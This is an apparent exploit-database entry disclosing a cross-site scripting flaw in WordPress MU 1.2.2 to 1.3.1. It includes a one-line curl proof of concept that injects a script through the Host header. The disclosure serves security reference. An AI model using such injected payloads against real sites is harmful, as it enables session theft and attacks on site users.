WordPress MU 1.2.2 < 1.3.1 - '/wp-includes/wpmu-functions.php' Cross-Site Scripting
Author: Juan Galiana Lara type: webapps platform: php port: date_added: 2009-11-09 date_updated: verified: 1 codes: tags: aliases: screenshot_url: application_url: raw file: 10090.txt
An attacker can exploit this issue by enticing an unsuspecting user to follow a malicious URI. The following proof of concept is available: curl -H "Cookie: my cookies here" -H "Host: <body onload=alert(String.fromCharCode(88,83,83))>" http://www.example.com/wp-admin/profile.php> tmp.html $ firefox tmp.html